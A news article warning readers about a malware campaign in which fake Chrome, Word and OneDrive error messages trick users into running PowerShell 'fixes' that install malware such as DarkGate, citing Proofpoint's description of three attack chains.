If you see this error message in Chrome, be suspicious: you could infect your PC with malware

A new malware distribution campaign is using fake errors in Google Chrome, Microsoft Word, and OneDrive. According to BleepingComputer, the purpose of these false alerts is to deceive users and make them run malicious PowerShell “fixes” in order to install malware on their computers. The campaign is being used by various cybercriminal groups, such as ClearFake, ClickFix, and TA571, the latter known for distributing large volumes of spam emails with malware and ransomware.

Google Chrome DOWNLOAD

In previous attacks, ClearFake used website overlays to encourage users to install fake browser updates. In the new attacks, in addition to overlays, cybercriminals are using JavaScript in compromised HTML and web attachments.

According to a report from cybersecurity company Proofpoint, these error messages deceive the user into copying a supposed PowerShell fix to the clipboard, and then pasting and executing it using the Run function or in a PowerShell console with administrator permissions. “Although the attack chain requires significant user interaction to succeed, the social engineering is clever enough to present someone with what appears to be a real problem and solution simultaneously, which can prompt a user to act without considering the risk,” the company warns.

Proofpoint has identified three different attack chains in their early stages; only one of these cannot be confidently attributed to TA571. In the first case, which is associated with ClearFake, users visit a compromised website that loads a malicious script hosted on the Binance blockchain. This script displays a fake Google Chrome warning and asks the visitor to install a “root certificate” by running a PowerShell script.

The second attack chain, deriving from a ClickFix campaign, uses compromised web injections that create iframes to display fake Google Chrome errors, requesting users to execute PowerShell commands. The third attack chain uses emails with HTML attachments that appear to be Microsoft Word documents, asking users to install the “Word Online” extension to view the document correctly.

In all cases, PowerShell commands download and execute malicious files, resulting in infections such as Matanbuchus or DarkGate. With these new campaigns, cybercriminals take advantage of users’ lack of awareness about the risks of running PowerShell commands and the inability of Windows to detect these malicious actions.

Google Chrome DOWNLOAD